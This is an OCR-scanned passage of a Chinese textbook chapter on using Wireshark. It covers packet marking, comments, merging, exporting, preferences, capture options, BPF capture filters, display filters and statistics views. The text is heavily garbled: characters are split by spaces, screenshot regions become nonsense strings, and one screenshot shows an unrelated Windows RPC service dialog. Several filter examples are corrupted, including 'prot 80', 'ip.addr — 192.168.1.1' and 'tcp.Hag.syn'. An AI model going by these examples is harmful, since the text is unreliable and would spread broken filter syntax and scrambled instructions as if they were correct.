部 正确 ， 如 果 数据 流 比较 大 建议 不 开启 名 效果， 用 户 可 以 单 击 “ 视 图 ”菜单 ， 在 弹 
称 解 析 ， 在 对 抓 取 的 数据 包 处 理 时 再 进行 ”出 的 菜单 列表 中 选择 “着 色 规 则 ”菜单 命 


解析 。 令 ， 如 下 图 所 示 。 
7.2.2 数据 包 操作 二 


对 话 着 色 


数据 包 操 作 是 Wireshark 的 主要 功能 ， - 
获取 数据 包 后 ， 用 户 可 以 对 数据 包 进行 标 ， [es 国 打开 下 图 所 示 的 对 话 框 ， 在 其 中 修改 
记 、 注 释 、 合 并 、 打 印 以 及 导出 等 操作 。 ，， 数 据 包 的 颜色 ， 从 这 里 修改 的 颜色 规则 将 
会 永久 保存 。 
1. 标记 数据 包 I 


标记 数据 包 可 以 实现 对 比较 重要 的 数 
据 包 进行 标记 ， 同 时 还 可 以 修改 数据 包 显 
示 颜 色 。 标 记 数 据 包 的 操作 步骤 如 下 : 
BBtep 图 在 需要 进行 标记 的 数据 包 上 ， 右 击 ， 
在 弹出 的 菜单 中 选择 “标记 /取消 标记 分 
组 ”菜单 命令 ， 如 下 图 所 示 。 
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侈 提示 : 默认 情况 下 ，Wireshark 提 供 的 颜 
色 规 则 可 以 满足 用 户 的 需求 ， 如 果 不 是 特 
珠 需要 不 建议 永久 修改 数据 包 的 颜色 。 


3. 修改 列表 项 颜色 


具体 的 操作 步骤 如 下 : 
stp 图 双击 需要 修改 的 列表 项 ， 下 方 会 出 
现 “ 前 景 ” 和 “背景 ”两 个 按钮 ， 如 下 图 
所 示 。 


Wireshark Coloring Rules Defautt © 


smb Il nbss Il nbns Il nblpx || psap || netblos 
http2 


二 
-wi Ee 


Grep Export po ©Cancel | OK 


单 击 “ 前 景 ”3 
出 “选择 颜色 ”对 话 框 ，Wireshark 提 供 了 
丰富 的 颜色 。 当 然 如 果 有 需要 还 可 以 自 定 
义 颜 色 ， 如 下 图 所 示 。 


区 选择 部 色 | ae) | 
| | | 
| | | 
| 
“| le 

上 自 定 义 

加 可 本 


4. 添加 注释 


Wireshark 提 供 对 数据 包 注 释 的 功能 ， 
在 实际 操作 中 如 果 感 觉 这 个 数据 包 有 问题 
或 者 比较 重要 ， 可 以 添加 一 段 注释 信息 ， 
具体 操作 步骤 如 下 : 
[step 图 右 去 需要 添加 注释 信息 的 数据 包 ， 在 
弹出 的 快捷 菜单 中 选择 “分 组 注释 ”菜单 
命令 ， 如 下 图 所 示 。 

标记 /取消 标记 分 级 | 


忽略 /取消 忽略 分 组 () 
设 : 设置 时 间 参 考 


分 组 注释 - 
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[see 图 这 时 会 弹出 下 图 所 示 的 对 话 框 ， 在 其 
中 输入 相应 的 注释 。 添 加 注释 信息 后 下 方 
的 解读 列表 也 会 出 现 这 段 注释 信息 ， 以 方 
便 用 户 查 看 。 


Wireshark .Packet5Comment ©@ 


Help 


cancel | voK 


5. 合并 数据 包 


在 实际 抓 包 过 程 中 ， 如 果 网 络 流量 比 
较 大 ， 不 停止 抓 包 操作 ， 可 能 会 出 现 抓 包 
工具 消耗 掉 所 有 内 存 ， 最 终 导致 系统 崩溃 
的 状态 。 为 解决 这 个 问题 ， 用 户 可 以 采取 
分 段 抓 取 ， 生 成 多 个 数据 包 文件 ， 最 后 为 
了 整体 分 析 ， 再 将 这 些 分 段 数据 包 合 并 成 
一 个 包 。 合 并 数据 包 的 操作 步骤 如 下 : 
[step 国 | 选择 “文件 ”菜单 项 ， 在 弹出 的 菜 


单列 表 中 选择 “合并 ”菜单 命令 ， 如 下 图 
所 示 。 

打开 Ctrl+O 

打开 最 近 

合并 (M)- 

从 Hex 转 储 导 入 (1).. 

关闭 Ctrl+W | 


打开 “合并 捕获 文件 ”对 话 框 ， 在 其 
中 选择 需要 合并 的 文件 ， 即 可 完成 合并 数 
据 包 的 操作 ， 如 下 图 所 示 。 


Wireshark .合并 捕获 文件 © 
查看 : 六 /root/Downloads "|**+ 人 4 和 时 EE 
国 计算 机 名 称 ”大 小 类 型 
图 root YY mount-shared-folders.sh 291 字 节 sh File 

出 restart-vm-tools.sh 130 字 节 sh File 
全 tcp.pcepng 1.02 MiB pcap..Fitk 
文件 名 称 (N) : | 
© Cancel 
文件 类 型 : 。 AllFiles -| 上 hep 
前 置 分 组 
按时 间 发 合并 
追加 分 组 
读 取 过 滤器 : 。 Appty aread filter 


6. 打印 数据 包 


Wireshark 提 供 了 数据 包 打 印 功能 ， 可 
以 将 比较 重要 的 数据 包 进行 打印 。 打 印 数 
据 包 的 操作 步骤 如 下 : 
step 加 选择 “文件 ”菜单 项 ， 在 弹出 的 菜 
单列 表 中 选择 “打印 ”菜单 命令 ， 如 下 图 
所 示 。 


导出 SSL 会 话 密 钥 .… 

导出 对 象 

打印 (P)- Ctrl+P 
退出 Ctrl+Q 


step 国 弹出 “打印 ”对 话 框 ， 在 该 对 话 框 中 
会 显示 此 次 打印 数据 包 的 一 些 信 息 ， 包 括 
缩 略 图 、 概 要 等 ， 如 下 图 所 示 。 


Remote Procedure Call (RPC) 的 属性 (本 地 计算 机 ) x 


第 规 。 本 录 。 恢复 。 依存 关系 


甘 毕 服务 依 损 于 其 他 服务 、 系 统 驱 动 程序 或 加 载 烦 序 给。 如 果 甘 个 系统 组 件 被 停 
止 或 运行 不 正常 ， 依 妆 于 它 的 服务 会 受到 影响 ， 


Remote Procedure Call (RPC) 


此 服务 依赖 以 下 系统 组 件 (T); 


由 恕 RPC Endpoint Mapper 


以 下 系统 组 件 依 台 此 服务 (月 : 


有 ActiveX Installer (AxinstSV) ~ 
由 恕 Application Identity 

总 Application Information 

由 六 AppX Deployment Service (AppXSVO) 
总 Background Intelligent Transfer Service 
四 -请 Background Tasks Infrastructure Service 
由 网 Base Filtering Engine 


LE 二 | 


7. 导出 数据 包 


Wireshark 提 供 了 数据 包 导 出 功能 ， 用 
户 可 以 进行 筛选 导出 ， 还 可 以 通过 分 类 导 
出 ， 还 可 以 只 导出 选中 数据 包 。 导 出 数据 
包 的 操作 步骤 如 下 : 
[step 园 选择 “文件 ”菜单 项 ， 在 弹出 的 菜单 
列表 中 选择 “导出 特定 分 组 ”菜单 命令 ， 
如 下 图 所 示 。 
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导出 特定 分 组 ~- 
导出 分 组 解析 结果 
导出 分 组 字 节 流 (B)- 
导出 PDU 到 文件 ~ 
导出 SSL 会 话 密 钥 .. 
导出 对 象 


[step 图 弹出 “导出 特定 分 组 ”对 话 框 ， 在 其 
中 可 以 选择 导出 数据 包 的 名 字 ， 并 设置 导 
出 范围 是 所 有 分 组 还 是 仅 选 中 分 组 ， 如 下 
图 所 示 。 


Ctrl+Shift+X 


Wireshark. 导出 特定 分 组 © 
得 看 外 /rooUDowntoads -+*v+ 和 3 世 
号 计算 机 名称 了 大 小 类 型 日 期 被 修 
国 root tppcapng 1.02 MiB pcap--File 2018/1 
or 
文件 名 称 (N) : | | 
SCancel 
导出 为 : Wireshard)...- pcapng "| Hep 
分 组 范围 用 gzip 压 编 (Z| 
已 捕获 5 已 显示 
“所 有 分 组 A) 3315 
仅 选 中 分 组 (S) a 
苑 转 IR) 0 


[step 图 如 果 选 择 “ 导 出 分 组 解析 结果 ”菜单 
命令 ， 可 以 将 数据 包 导 出 不 同 的 格式 ， 如 
下 图 所 示 。 如 可 以 是 使 用 Excel 查 看 的 CSV 
格式 、 使 用 记事 本 查看 的 纯 文 本 格式 ， 还 
可 以 将 数据 包 导 出 为 C 语 言 数 组 、XMIL 数 
据 、JSON 数 据 等 格式 。 


为 CSV.. 
为 上 语言 数组 ... 
为 PSBMLXML.. 
为 PDMLXML.. 
为 JSON. 


7.2.3 首选 项 设置 


大 多 数 软件 都 会 提供 一 个 首选 项 设 曾 
置 ， 该 设置 主要 用 于 配制 软件 的 整体 风 
格 ，Wireshark 也 提供 了 首选 项 设置 。 进 行 
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首选 项 设置 的 操作 步骤 如 下 : 
step[ 选择 “编辑 ”菜单 项 ， 在 弹出 的 菜单 


列表 中 选择 “首选 项 ”菜单 命令 ， 如 下 图 
所 示 。 

分 组 注释 - CtrlrAtt+C 

Delete All Packet Comments 

配置 文件 - Ctrl+Shift+A 

首选 项 (P).- Ctrl+ShiftrP | 


[step 图 打开 “首选 项 ”对 话 框 ， 如 下 图 所 
示 。 首 次 打开 “首选 项 ”对 话 框 后 ， 在 默 
认 打 开 的 界面 中 ， 用 户 可 以 进行 相关 选项 
的 设置 。 

Wireshark ,首选 项 © 


[Appeaance ml 
了 记 住 证 面 3 的 大 小 及 位 置 


lors 打开 文件 严 中 的 文件 
”最近 使 用 的 文件 实 


EF 


10 “个 最 近 文件 

Y 确认 来 保 译 的 摘 区 文 件 

主 工具 栏 必 式 。 只 有 图 标 ~ 
请 谋 ， 使 用 折线 设置 


Bretp 


Scancel 


“首选 项 ”对 话 框 中 相关 参数 的 介绍 
如 下 : 

e “ 记 住 主 窗口 的 大 小 及 位 置 ” 复 选 
框 : 选中 之 后 ， 每 次 打开 都 将 是 固 
定 大 小 。 

e “打开 文件 夹 中 的 文件 ”: 设置 默 
认 打开 或 保存 文件 的 路 径 ， 如 果 经 
常 抓 取 数 据 包 ， 建 议 设置 一 个 固定 


vox 


的 位 置 。 
e “显示 最 多 ”: 显示 数据 包 条 目 ， 
根据 实际 需要 进行 设置 即 可 。 


。 “确认 未 保存 的 捕获 文件 ” 复 选 
框 : 选中 之 后 ， 没 有 保存 的 文件 名 
前 面 会 多 出 一 个 “* ”号 ， 提 示 用 户 
没有 保存 ， 一 般 建议 开启 。 

e “ 主 工具 栏 的 样式 ”: 这 里 有 三 种 样 
式 供 选择 ， 即 只 有 图 标 、 只 有 文本 、 
图 标 加 文本 ， 根 据 需要 选择 即 可 。 

e “语言 ”: 设置 语言 环境 ， 这 里 可 
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以 选择 多 种 国家 语言 ， 如 果 英 文 较 
好 可 以 切换 成 英文 状态 。 
Estee 国 在 “首选 项 ”对 话 框 中 ， 选 择 
Columns 项 ， 然 后 单 击 左下 方 的 “+” 按 钮 
可 以 添加 一 个 列 ， 单 击 “-” 按 钮 可 以 删除 
一 个 列 ， 如 下 图 所 示 。 


字段 发 生 


+ 


选择 Font and Colors 项 ， 在 打开 界面 
中 可 以 设置 软件 字体 大 小 以 及 默认 颜色 ， 
如 下 图 所 示 。 


主 窗 口 字体 : Liberation Mono 11.0 
Lazy badgers move unique waxy jellyfish packets 0123456789 


闫 名: 
line | 
ll 


| “过 器 数据 流 "客户 端 示例 文本 
leal “追踪 数据 流 "服务 器 示例 文本 
有 效 过 站 性 示例 ] 
(Ei | 
| |Sample waming filter | 


[step 图 选择 Layout 项 ， 在 打开 的 界面 中 可 
以 设置 软件 显示 布局 ， 该 项 还 是 比较 重要 
的 ， 默 认 情 况 下 ， 软 件 选择 的 是 分 3 横 显 
示 ， 根 据 个 人 喜好 可 以 选择 不 同 的 布局 方 
式 进 行 显示 ， 如 下 图 所 示 。 


T 1 1 同 抽 
3 日 3 3 


窗 格 二 


窗 格 2: 


中 分 组 列表 分 组 列表 分 组 列表 
分 组 详 倩 分 组 详情 分 组 详情 
分 组 字 节 流 分 组 子 书 流 分 组 字 节 流 
无 无 无 


Packet List settings: 
Show packet separator 
状态 栏 设置 : 
Show selected packet number 
显示 文件 加 载 时 间 
Restore Defaults 


7.2.4 捕获 选项 


捕获 选项 主要 针对 抓 取 数据 包 使 用 的 
网 卡 、 抓 包 前 的 过 滤 、 抓 包 大 小 、 抓 包 时 
长 等 进行 设置 。 这 个 功能 在 抓 包 软 件 中 也 
属于 非常 重要 的 一 个 设置 。 


1. 进行 捕获 选项 设置 

进行 捕获 选项 设置 的 操作 步骤 如 下 : 
Eee 加 选择 “捕获 ”菜单 项 ， 在 弹出 的 菜 
单列 表 中 选择 “选项 ”菜单 命令 ， 如 下 图 
所 示 。 


CtrltK 
Ctrl+E 


| 捕获 过 滤器 (E).. 
| 刷新 接口 列表 F5 


打开 “捕获 接口 ”对 话 框 ， 默 认 选 中 

“输入 ”选项 卡 ， 其 中 混杂 模式 为 选中 状 
态 ， 该 项 需要 选中 否则 可 能 抓 取 不 到 数据 
包 ， 列 表 中 列 出 网 卡 相关 信息 ， 选 择 相应 
的 网 卡 可 以 抓 取 数据 包 ， 如 下 图 所 示 。 


Wireshark 靖 本 入口 9 


入 名 出 。 提 贡 
撤 


下 所 有 要 口上 便 册 水 模 开 ED 


所 法 入口 的 灿 过 光 [En 0spie oI 
rp cos [了 


Eee 图 在 “捕获 接口 ”对 话 框 中 ， 选 择 “ 输 
出 ”选项 卡 ， 在 其 中 可 以 设置 文件 保存 的 
路 径 、 输 出 格式 、 是 否 自动 创建 新 文件 
等 ， 如 下 图 所 示 。 

| x or EF 


| 
| 名 出 格式 = 5 pcapng peap 
| 


EE: 
1 加 


使 用 一 个 环形 二 冲 加 ,采用 [2 文件 


默认 “自动 创建 新 文件 ” 复 选 框 未 被 
选中 ， 选 中 后 可 以 指定 保存 规则 ， 有 3 种 规 
则 可 供 选择 。 
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(1) 根据 抓 包 文件 的 大 小 ， 达 到 规定 
大 小 保存 更 换 下 一 个 文件 ， 保 存 文件 大 小 3 
可 以 调整 。 

(2) 根据 时 间 长 度 判断 ， 达 到 规定 时 
间 保 存 更 换 下 一 个 文件 。 例 如 ， 每 间隔 1 
分 钟 存储 一 个 文件 。 

(3) 循环 模式 ， 只 是 用 两 个 数据 包 ， 

初始 时 会 创建 两 个 数据 包 ， 当 需要 第 三 
数据 包 时 不 创建 而 替换 第 一 个 数据 包 ， 
依次 循环 。 
[Sep 图 在 “捕获 接口 ”对 话 框 中 ， 选 择 “ 选 
项 ”选项 卡 ， 在 其 中 可 以 设置 显示 选项 、 
解析 名 称 、 自 动 停止 捕获 等 参数 ， 如 下 图 
所 示 。 


显示 选项 解析 名 称 
V 实时 更 新 分 组 列表 VY MAC 地 址 解析 
VY 实时 捕获 时 自动 滚屏 解析 网 络 名 称 
解析 传输 层 名 称 
自动 停止 捕获 ， 在 经 过 .… 
1 分 组 
1 2 文件 


1 ME 


侈 提示 : 这 里 的 自动 停止 捕获 规则 ， 相 当 
于 一 个 定时 器 的 作用 ， 当 符合 条 件 后 停止 
抓 包 ， 可 以 同 多 文件 保存 功能 配合 使 用 。 
例如 : 设置 每 1MB 保 存 一 个 数据 包 ， 符 合 
10 个 文件 后 停止 抓 包 。 


2. 数据 包 的 过 滤 设 置 

Wireshark 抓 包 过 滤 是 基于 libpcap/ 
Winpcap 库 实现 的 ， 所 以 遵循 BPF (Berke- 
ley Packet Filter) 语法 ， 其 中 包括 类 型 
(Type) 、 方 向 (Dir) 、 协 议 (Proto) 、 
逻辑 运算 符 。 

e@ 类 型 : host、net、port。 

@ 方向 : src、dst。 

e 协议 : 

fp 等 。 


ether、ip、tcp、udp、http、 
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e 逻辑 运算 符 ，&& 与 、|| 或 、! 非 。 

例如 : 想 要 抓 取 源 地 址 位 192.168.0.100 
目的 地 端口 为 80 的 流量 ， 过 滤 语 句 为 : 
(src host 192.168.0.100 && dst port 
80) ; 想 要 抓 取 IP 地 址 192.168.0.100 和 
192.168.0.101 的 流量 ， 过 滤 语 句 为 : (host 
192.168.0.100 || host 192.168.0.101) ; 想 
要 抓 取 除 广播 外 的 所 有 包 ， 过 滤 语 句 为 : 


(! broadcast) 。 


3. 开始 捕获 数据 包 

(1) 过 滤 MAC 地 址 。 过 滤 的 语法 格 
式 为 : 

ether host < 需要 过 滤 的 MAC 地 址 > 


ether src host <MRC 地 址 > 
ether dst host <MAC 地 址 > 


例如 : 对 MAC 地 址 过 滤 ， 可 以 在 “所 
选择 接口 的 捕获 过 滤器 ”文本 框 中 输入 如 
下 图 所 示 的 语句 。 


MV 在 所 有 接口 上 使 用 泥 杂 模式 
所 这 择 授 口 的 搬 获 过 浊 器 ， 册 eher sre tac 336073 画 - 


侈 提示 : 如 果 过 滤 字 段 输入 错误 ， 则 背景 
色 是 红色 ， 输 入 正确 则 是 绿色 。 


(2) 过 滤 卫 地 址 。 过 滤 的 语法 格式 为 : 


host < 需 过 滤 的 IP 地 址 > 
src host <IP 地 址 > 
dst host <IP 地 址 > 


例如 : 对 IP 地 址 过 滤 ， 可 以 在 “所 选 
择 接口 的 捕获 过 滤器 ”文本 框 中 输入 下 图 
所 示 的 语句 。 


可 拓 撞 口 的 摘 罗 过 六 上 有 srchost192168.0300| 四- 
(3) 过 滤 端 口 。 过 滤 的 语法 格式 为 : 


prot 80、! prot 80、dst port 80、src 
port 80 


过 滤 协 议 为 : amp、icmp、http。 

例如 : 综合 过 滤 地 址 与 端口 ， 可 以 在 
“所 选择 接口 的 捕获 过 滤器 ”文本 框 中 输 
入 下 图 所 示 的 语句 。 
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习 在 所 有 有 慷 吕 上 全 用 志 示 柱 式 
所 选择 接口 的 捕 针 过 次 器 : 上 [host192168.0100 8& port 808d| 画 -] 


移 提 示 : 抓 包 过 滤 一 旦 设置 后 将 只 抓 取 符 
合 规则 的 数据 包 ， 这 样 会 过 滤 掉 大 量 干扰 
数据 包 ， 从 而 提高 抓 包 数据 的 准确 率 。 


4. 过 滤 数 据 包 

显示 过 滤器 与 抓 包 过 滤 类 似 ， 显 示 过 
滤器 是 在 已 经 抓 取 的 数据 包 中 过 滤 ， 显 示 
出 需要 的 数据 包 ， 在 快捷 方式 的 下 方 有 一 
个 可 以 输入 表达 式 的 地 方 ， 如 下 图 所 示 。 
在 这 里 输入 相应 的 表达 式 即 可 过 滤 。 


J a | 


显示 过 滤 的 语法 设置 规则 如 下 : 

e 比较 操作 符 : == 等 于 、! = 不 等 
于 3S 大 于 < 小 于 ,>= 大 于 等 于 
<= 小 于 等 于 。 

e 逻辑 操作 : and 与 操作 、or 或 操作 、 
xor 异 或 操作 、not 非 操作 。 

e ”IP 地 址 : ip.addr、ip.src、ip.dst。 

e 过滤 端口 : tcp.port、tcp.srcport、 
tcp.dstport、 tcp.flat.syn、 tcp.flag. 
ack。 

e@ 过 滤 协 议 : arp、ip、icmp、upd、 
tcp、bootp、dns 等 。 

例如 : 想 要 过 滤 满 足以 下 条 件 的 数据 

其 中 ，JP 地 址 如 下 设置 : 

ip.addr — 192.168.1.1 

ip.sre — 192.168.1.1 

ip.dst == 192.168.1.1 

ip.src == 192.168.1.100 and ip.dst == 

58.106.127.80 


这 


端口 如 下 设置 : 
tcp.port 一 80 
tcp.srcport 一 80 
tcp.dstport 一 80 
tcp.Hag.syn 一 1 
过 滤 协 议 如 下 : 


arp、tcp、udp、not http、not arp 


下 面 给 出 一 个 综合 过 滤 的 语句 ， 其 中 
筛选 了 IP 地 址 为 192.0.2.1 并 且 不 是 从 tcp 协 
议 80、25 端 口 发 出 的 包 。 下 图 为 输入 的 表 
达 式 。 

厦 男 总 国 吾 日 网 固 Q * 
(Nlip.addr == 192.0.2.1and not tcp.port in {80 25| 

问题 : 什么 情况 使 用 抓 包 过 滤 ? 什么 
情况 使 用 显示 过 滤 ? 

如 果实 际 网 络 数据 流量 比较 大 ， 并 
且 已 经 锁定 数据 包 类 型 可 以 使 用 抓 包 过 滤 
器 。 一 般 如 果 没 有 特殊 需求 建议 使 用 整体 
抓 包 ， 然 后 再 进行 显示 过 滤 ， 保 证 一 个 真 
实 的 网 络 环境 ， 根 据 需要 再 进行 筛 分， 这 
样 分 析 数 据 包 效果 会 更 好 。 


高 级 操作 


高 级 操作 是 将 捕获 的 数据 包 以 更 直观 
的 形式 展现 出 来 ， 学 会 如 何 使 用 这 些 高 级 
技能 ， 对 于 以 后 的 数据 包 处 理会 更 加 得 心 
应 手 。 


7.3 


7.3.1 分 析 数 据 包 


分 析 数 据 包 主要 包括 数据 追踪 与 专家 
信息 两 方面 内 容 ， 它 们 都 属于 “分 析 ” 菜 
单 下 的 功能 。 


1. 数据 追踪 

正常 通信 中 如 TCP、UDP、SSL 等 数 
据 包 都 是 以 分 片 的 形 发 送 的 ， 如 果 在 整个 
数据 包 中 分 片 查 看 数据 包 不 便于 分 析 ， 使 
用 数据 流 追 踪 可 以 将 TCP、UDP、SSL 等 
数据 流 进行 重组 ， 以 一 个 完整 的 形式 呈现 
出 来 。 

打开 追踪 流 有 两 种 方式 : 

第 1 种 方式 : 在 数据 流 显 示 列 表 中 ， 选 
择 需 要 追踪 的 数据 流 ， 右 击 ， 在 弹出 的 快 
捷 菜单 中 选择 “追踪 流 ” 菜 单 命令 ， 如 下 
图 所 示 。 
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sik : 
第 2 种 方式 选择“ 分析” 菜单 ， 在 
弹出 的 菜单 列表 中 选择 “追踪 流 ” 菜 单 命 
令 ， 如 下 图 所 示 。 
重新 载 入 Lua 插件 | 


SCTP 
| 
追踪 流 | 


以 上 两 种 方式 都 可 以 打开 “追踪 流 ” 界 
面 ， 如 下 图 所 示 。 从 这 里 可 以 清晰 地 看 到 这 
个 协议 通信 的 完整 过 程 ， 其 中 发 送 请 求 会 以 
红色 显示 ， 服 务 器 返回 结果 会 显示 为 蓝 色 。 


Wireshark 如 路 TCP 适 tcpstream eq ol.tcp pcapng ee 
Linux x86_64; rv;00,0) Gecko/29196191 Firefox/60,0 
lain 
15 Nay 2917 18:64:40 GNT 
cel444eb7d28996123" 
apPpsCnxZ9htlybkh21oHZXShTNPEtIMHvqkqS4aAASA=- 
ore，mu5t-Tevalidate 
4 CHT 
X11; Linux x86 64; rv:60.0) Gecko/20198191 Firefox/60.0 。 
显示 和 保存 数据 为 ASCH “| 流 0 
百科 FREETT 


Cm 洋 拉 此 流 打印 “|| Saweas- 通 加 || XCloww 


2. 专家 信息 

专家 信息 可 以 对 数据 包 中 特定 状态 
进行 警告 说 明 ， 其 中 包括 错误 信息 (er- 
rors) 、 警 告 信息 (warnings) 、 注 意 信 息 
(notes) 以 及 对 话 信息 (chats) 。 查 看 专 
家 信息 的 操作 步骤 如 下 
[Sep 加 选择 “分 析 ” 菜 单项 ， 在 弹出 的 菜单 


列表 中 选择 “专家 信息 ”菜单 命令 ， 如 下 
图 所 示 。 

as | 

| 专家 信息 


[Sep 图 打开 “专家 信息 ”对 话 框 ， 如 下 图 所 
示 。 其 中 错误 信息 会 以 红色 进行 标注 ， 警 
告 信息 以 黄色 进行 标注 ， 注 意 信息 以 浅 蓝 
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色 进 行 标注 ， 正 常 通信 以 深蓝 色 进 行 标注 ， 每 一 种 类 型 会 单独 列 出 一 行进 行 显 示 ， 通 过 专 
家 信息 可 以 更 直观 地 查看 数据 通信 中 存在 哪些 问题 。 
Wireshark .专家 信息 -tcp pcapng Boe 


~ Summary Group 协议 计数 


Severity 


加 7 玉生 :hep stream eq 0” a 
显示 这 汽 吕 的 限制 。 了 按 摘 要 分 组 。 提 索 : 显示 - -~ 
BHep | Close 


加 7.3.2 ”统计 数据 包 


: 通过 对 数据 包 的 统计 分 析 ， 可 以 查看 更 为 详细 的 数据 信息 ， 进 而 分 析 网 络 中 是 否 存在 
安全 问题 。 查 看 数据 包 统计 信息 的 操作 步骤 如 下 : 

step 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “捕获 文件 属性 ”菜单 命令 ， 打 开 “ 捕 
获 文件 属性 ”对 话 框 ， 在 其 中 可 以 查看 文件 、 事 件 、 捕 获 、 接 口 等 信息 ， 如 下 图 所 示 。 


Wireshark ,捕获 文件 属性 .tcp.pcapng eo 

二 节 

文件 

名 种 : Jroot/Downloads/tcp.pcapng 

长 麻 : 1070kB 

格式 : Wireshark/... ~ pcapng 

封装 : Ethernet 

时 间 

第 一 个 分 组 : 2018-10-1021:43:23 

最 后 分 组 : 2018-10-10 21:45:39 

经 过 时 间 : 00:02:16 

捕获 

硬件 : AMD Phenom(tm) I| X6 1090T Processor 

Os: Linux 4.18.0-<alil-amd54 

应 用 : Dumpcap [Wireshark) 2.6.3 (Git v2.6.3 packaged as 2.6.3-1) 

接口 

接口 去 痉 分 组 撕 获 过 沪 器 刍 趾 类 型 分 组 大 小 归 制 

wlanO 0(0%) 无 Ethernet 262144 字 节 
a 

捕获 文件 描述 

Hep | Ga | 复制 到 到 巾 板 二 保存 注 和 


step 回 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “协议 分 级 ”菜单 命令 ， 打 开 “ 协 
议 分 级 统计 ”对 话 框 ， 如 下 图 所 示 。 从 这 里 可 以 统计 出 每 一 种 协议 在 整个 数据 包 中 的 占 
有 率 。 
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Wireshark- 节 设 分 久久 计 -teppeopng eee 
C3 TI 
FE 033315 oo 5 0 o 日 
Enemer 00053 3315 48 46410 2723 0 9 0 
earnes protocol Veron 01 2 ao 9 9 9 
eerner Control Mesage Protocol vs ol 日 op 3 2 5 3 
ntermet Protocol Verson 4 93983 3310 9 5200 3885 0 9 o 
Veer Datagram pretocal ie 364 oa 2 70 9 9 日 
Twork Time Proroco 02 ? 0 3a6 1 了 3s6 ys 
Domain Name Sstem 108 357 27 25531 1498 357 25531 1498 
Tenemssien Control protocol 43 5601 47。 2455 4463 35% 
Secure sowets Layer 105 343 192 183994 Ok -335 155749 9al 
Moformed Pocket 12 3 00 0 3 0 
» Mparte Transisr Protocol 四 lo9 02 9a4os Hk 机 6 0 
omine Cerameate Status Pretecal 02 下 ol ls5 74 5 55 
Meda Type 02 7 45 2583 2505 了 45574 2674 
Line Sacrd to dats 4 也 153 146915 ao2 OBL 1744 
par a z 3 2 157 2 2 3 
Jtermer Control Mescage Protocol 01 3 00 3l6 。 所 3 3l6 1 
dere Rosolation Protocel 01 3 op 到 1 a 1 
re [See 


step 图 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “对 话 ” 菜 单 命令 ， 打 开 下 图 所 示 
的 对 话 框 ， 其 中 包括 以 太 网 、IPv4、IPv6、TCP、UDP 等 不 同 协议 会 话 信息 展示 。 


Wiresharh -Comersations tcp Paapng ogee 
Eee pa 0 | N61 | TeP -1 Vop-127 
enh -NB Bakes Mies PliesAB BeAID PoloshA BmnrA fe Denim As 
FE 和 1 5 0 3 
0 I mt 0000 136 
em Comet sD 
ep 中 nc | 


step 罗 | 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “端点 ”菜单 命令 ， 打 开 下 图 所 示 
的 “端点 ”对 话 框 ， 其 中 包含 以 太 网 和 各 种 协议 选项 。 


Wireshark . Endpoints tcp.pcapng eeoe 
Ethernet-4 ，IPv4.31 IPv6:2 TCP:145 UDP-133 
Address “Packets Bytes TxPackets TxBytes RxPackets RxBytes 
33:33:00:00:00:16 2 180 0 0 2 180 
3312 958« 1807 178k 1505 780k 
3.313 958« 1508 780k 1805 177k 
3 126 0 0 3 126 
解析 名 称 显示 过 滤器 的 限制 Endpoint 类 型 ~ 


BHelp 复制 


选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “分 组 长 度 ” 菜 单 命令 ， 打 开 下 图 
所 示 的 “分 组 长 度 ” 对 话 框 。 这 里 可 以 对 不 同 大 小 数据 包 进 行 统计 。 


Wireshark . Packet Lengths .tcp.pcapng ee 


~ Count Average Min val Max val Rate (ms) Percent Burst rate Burst start 
3315 289.15 42 1514 0.0243 100% 1.6200 134.305 
Di - 0.0000 0.00% - - 

0 = - 0.0000 0.00% - - 

2122 63.50 42 79 0.0156 64.01%1.4500 134.342 

372 105.34 80 159 0.00277 1122% 0.1200 77159 


160-319 150 21317 160 312 0.001l 4.52% 0.0500 131.903 
320-639 173 47935 323 625 0.00B 5.22% 0.0600 90.234 
640-1279 108 867.93 640 1270 0.0008 3.26% 0.0400 65.397 
1280-2559 390 1476.87 1306 1514 0.0029 1176% 0.1400 131.015 
2560-5119 0 - - - 0.0000 0.00% - 
5120and greater0 - - - 0.0000 0.00% - 


显示 过 滤器 : Entera display fitter 
复制 。 | 另存 为 .|| xclose 


Step 图 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “IO 图 表 ” 菜 单 命令 ， 打 开 下 图 所 
示 的 “IO 图 表 ” 对 话 框 ， 其 中 包括 一 个 坐标 轴 显 示 的 图 表 ， 下 方 可 以 添加 任意 的 协议 ， 
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也 可 以 选择 协议 显示 的 颜色 ， 还 可 以 调整 坐标 轴 的 刻度 。 


Packetsl1 秒 


Wireshark.IO 图 各.tcppcapng 


Wireshark10 图 表 : tcp.pcapng 


Segoe 


疝 者 革职 分 旭 3018 31 = 70) 
Enabled 


Graph Name Display Filter Color YReld 
国 


Siyle YAxs 
所 有 分 组 Lne Pack 


一 天 时 钟 


对 数 刻度 


None 


复位 


复制 || XClose | DisaveAs. 


step[ 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “流量 图 ”菜单 命令 ， 


打开 下 图 所 


示 的 “流量 图 ”对 话 框 ， 其 中 包括 通信 时 间 、 通 信 地 址 、 端 口 以 及 通信 过 程 中 的 协议 功 


能 ， 非 常 清晰 明了 。 


2018-10-10 214324203364244 


OM-10-10 2h4326355297507 


2 
FN 


me 


step 图 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “TCP 流 型 图 ”菜单 命令 ， 打 开 下 


meshark 天 -cppcapng 


oacaodlo 
9819 


A: Tcppom ~ 


图 所 示 的 对 话 框 。 在 其 中 可 以 根据 实际 需要 设置 相应 的 显示 ， 还 可 以 切换 数据 包 的 方向 。 


Segment Length (B) 


最 标 | 时 间 /序列 (Stevens) | 
时 间 /序列 (teptrace) 
国 DR 
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boiooorN 


理 吐 量 对 于 192.168.0.110:44786 > 80.239.178.19:80 (MA) 


吞吐 量 对 于 192.168.0.110:44786 > 80.239.178.19:80 (MA) 


tcp.pcapng 
15 3 45 6 75 9 
Timels) 
Obyees + 3 信 Obytes 


MAWindow(s) 1000000 3 流 |1 


Y 段 长 度 V 吞吐 量 。 实际 知 针 量 


5 
局 
dd6noudl a6eusAv 


局 | 切 按 太 向 | 


复位 


| ¥Close | cisaveAs- 
